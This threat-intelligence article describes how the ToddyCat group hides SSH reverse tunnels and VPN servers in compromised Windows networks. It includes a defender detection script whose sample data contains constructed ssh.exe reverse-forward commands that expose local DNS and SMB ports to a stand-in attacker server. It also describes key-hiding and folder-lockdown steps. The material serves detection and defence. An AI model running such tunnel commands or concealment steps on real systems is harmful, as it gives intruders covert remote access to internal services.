How the ToddyCat threat group sets up backup traffic tunnels into victim networks




To set up these tunnels, the attackers simply use the SSH client from the OpenSSH toolkit for Windows, together with the OpenSSH library it depends on and a private key file that lets the compromised endpoint authenticate to the attackers' server.

The OpenSSH client is dropped in the regular `C:\Program Files\OpenSSH` location, since its presence there would not necessarily be suspicious. The private key file, however, was given an .ini or .dat extension to hide its true purpose and was placed in the `C:\Windows\AppReadiness` folder. This folder is used by the Windows AppReadiness service to store application files for initial Windows or user configuration.

Furthermore, the attackers execute a script called a.bat which changes the directory ownership of this folder to make it only accessible to the SYSTEM user and inaccessible to regular users and Administrators.

The SSH tunnel will be started by a scheduled task and will be used to tunnel traffic from the attackers’ server to a local service. For example, a connection from user systemtest01 will tunnel traffic from port 31481 on the server to local port 53 (DNS) while a connection from user systemtest05 will redirect traffic from the malicious server to port 445, normally used by the SMB service. This will allow the attackers to interact with those local services remotely over the SSH tunnel.

For example, if the local system is a domain controller, it will likely run a DNS server on port 53 which can be queried to discover internal network hostnames. On the other hand, SMB is used for file sharing and could give access to local file shares on the server.
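A defender-side check for the tunnel pattern described above, added here as an example that is not part of the original article: it scans process-creation or scheduled-task command lines for ssh.exe invocations whose `-R` remote forward lands on local port 53 or 445 and whose `-i` identity file carries a disguised extension or lives under AppReadiness. The sample command lines, the 203.0.113.10 server address and the key file names are constructed for the demonstration.

```python
import shlex
from pathlib import PureWindowsPath
# Constructed command lines (not from the article); 203.0.113.10 is a documentation
# address standing in for the attackers' server.
SAMPLE_COMMAND_LINES = [
    r'"C:\Program Files\OpenSSH\ssh.exe" -N -R 31481:127.0.0.1:53 -i C:\Windows\AppReadiness\config.ini systemtest01@203.0.113.10',
    r'"C:\Program Files\OpenSSH\ssh.exe" -N -R 0.0.0.0:33445:localhost:445 -i C:\Windows\AppReadiness\cache.dat systemtest05@203.0.113.10',
    r'"C:\Program Files\OpenSSH\ssh.exe" -i C:\Users\admin\.ssh\id_ed25519 admin@git.example.internal',
    r'C:\Windows\System32\cmd.exe /c dir',
]
SENSITIVE_LOCAL_PORTS = {53: "DNS", 445: "SMB"}  # services the article says the tunnels targeted
DISGUISE_EXTENSIONS = {".ini", ".dat"}            # extensions used to hide the private key

def parse_remote_forward(spec):
    """Parse an ssh -R spec ([bind:]port:host:hostport) into (port, host, hostport), or None."""
    parts = spec.split(":")
    try:
        return (int(parts[-3]), parts[-2], int(parts[-1])) if len(parts) >= 3 else None
    except ValueError:
        return None

def assess_ssh_command(cmdline):
    """Reasons this command line matches the ToddyCat SSH-tunnel pattern (empty list = clean)."""
    # posix=False keeps Windows backslashes; quotes stay on the token, so strip them
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not toks or PureWindowsPath(toks[0]).name.lower() not in ("ssh.exe", "ssh"):
        return []
    reasons, i = [], 1
    while i < len(toks):
        tok = toks[i]
        if tok in ("-R", "-i") and i + 1 < len(toks):   # "-R spec" form
            opt, val, i = tok, toks[i + 1], i + 2
        elif tok[:2] in ("-R", "-i") and len(tok) > 2:  # "-Rspec" attached form
            opt, val, i = tok[:2], tok[2:], i + 1
        else:
            i += 1
            continue
        if opt == "-R":
            fwd = parse_remote_forward(val)
            if fwd and fwd[2] in SENSITIVE_LOCAL_PORTS:
                reasons.append(f"server port {fwd[0]} forwarded to local {SENSITIVE_LOCAL_PORTS[fwd[2]]} port {fwd[2]}")
        else:
            key = PureWindowsPath(val)
            if key.suffix.lower() in DISGUISE_EXTENSIONS:
                reasons.append(f"identity file with disguised extension {key.suffix}")
            if any(p.lower() == "appreadiness" for p in key.parts):
                reasons.append(f"identity file stored under {key.parent}")
    return reasons

def scan_command_lines(cmdlines):
    # Map each flagged command line to its reasons; clean lines are omitted
    return {c: r for c in cmdlines if (r := assess_ssh_command(c))}
```

Feed it the CommandLine field from Sysmon event 1 / Security event 4688 or the Actions of exported scheduled tasks; ssh.exe launched by the Task Scheduler with a remote forward to 53 or 445 is the combination worth alerting on.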

VPN connections have been set up on compromised servers

The ToddyCat attackers were also observed setting up virtual private network (VPN) servers on compromised systems by using the open-source SoftEther VPN software in order to be able to remotely connect to those systems. SoftEther supports multiple VPN protocols including L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.


